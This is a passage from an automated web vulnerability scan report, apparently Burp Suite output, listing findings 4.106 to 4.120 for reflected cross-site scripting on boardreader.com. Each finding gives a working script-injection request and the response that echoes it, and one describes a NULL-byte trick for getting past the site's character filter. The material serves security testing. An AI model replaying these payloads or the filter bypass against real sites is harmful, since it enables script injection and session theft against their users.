GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:31:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
f="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1">
...[SNIP]...

4.106. http://boardreader.com/index.php [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bb6"><script>alert(1)</script>60f59291b18 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gife6bb6"><script>alert(1)</script>60f59291b18&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/s0.2mdn.net/viewad/817-grey.gife6bb6"><script>alert(1)</script>60f59291b18?p=10&format=RSS2.0" />
...[SNIP]...

4.107. http://boardreader.com/index.php [q2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/index.php

Issue detail

The value of the q2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002cc1b"><script>alert(1)</script>44dd33ad4cf was submitted in the q2 parameter. This input was echoed as 2cc1b"><script>alert(1)</script>44dd33ad4cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
<A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext">
...[SNIP]...

4.108. http://boardreader.com/linkinfo/2mdn.net [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/linkinfo/2mdn.net

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d233"><script>alert(1)</script>fb62f634db2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linkinfo/2mdn.net9d233"><script>alert(1)</script>fb62f634db2 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>2mdn.n
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/2mdn.net9d233"><script>alert(1)</script>fb62f634db2?p=10&format=RSS2.0" />
...[SNIP]...

4.109. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/my/signup.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee33"><script>alert(1)</script>4385cd9a478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:04:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<form name="mylogin_" action="/my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1" method="POST">
...[SNIP]...

4.110. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/s/2mdn.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fe6"><script>alert(1)</script>3c9811f6ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1&p=20&format=RSS2.0" />
...[SNIP]...

4.111. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/s/2mdn.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63349'><script>alert(1)</script>baab44705c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/2mdn.html?63349'><script>alert(1)</script>baab44705c0=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<input type=hidden name='63349'><script>alert(1)</script>baab44705c0' value="1">
...[SNIP]...

4.112. http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Monterey_military_Group_CafeMo_764716.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992f8"><script>alert(1)</script>4308af3ecf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1" title="Monterey military Group - CafeMom | Site Profile">
...[SNIP]...

4.113. http://boardreader.com/site/Nolan_Fans_Forums_8842059.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Nolan_Fans_Forums_8842059.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42801"><script>alert(1)</script>8c06b2169ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1" title="Nolan Fans | Forums | Site Profile">
...[SNIP]...

4.114. http://boardreader.com/site/RateDesi_Forums_13026.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/RateDesi_Forums_13026.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e88"><script>alert(1)</script>ff22a856e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1" title="RateDesi Forums | Site Profile">
...[SNIP]...

4.115. http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Research_Learn_Message_Boards_1404604.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7999"><script>alert(1)</script>ffa4f5f1626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:54 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:13:55 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1" title="Research & Learn Message Boards - AOL Message Boards | Site Profile">
...[SNIP]...

4.116. http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Sherdog_Mixed_Martial_Arts_For_14952.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced5c"><script>alert(1)</script>6a0288545dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:20:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1" title="Sherdog Mixed Martial Arts Forums | Site Profile">
...[SNIP]...

4.117. http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/The_CafeMom_Newcomers_Club_Gro_655408.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6f5"><script>alert(1)</script>40022661852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1" title="The CafeMom Newcomers Club Group - CafeMom | Site Profile">
...[SNIP]...

4.118. http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/The_Mastiff_Sweet_Spot_6024491.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e18"><script>alert(1)</script>6e380957a50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1" title="The Mastiff Sweet Spot | Site Profile">
...[SNIP]...

4.119. http://boardreader.com/site/UFC_Community_Forum_9057873.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/UFC_Community_Forum_9057873.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb29"><script>alert(1)</script>110fab5c39e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1" title="UFC Community Forum | Site Profile">
...[SNIP]...

4.120. http://boardreader.com/site/Ultimate_College_Softball_5898982.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/site/Ultimate_College_Softball_5898982.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b11b"><script>alert(1)</script>5da4301906 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:10:49 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:10:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1" title="Ultimate College Softball | Site Profile">
...[SNIP]...

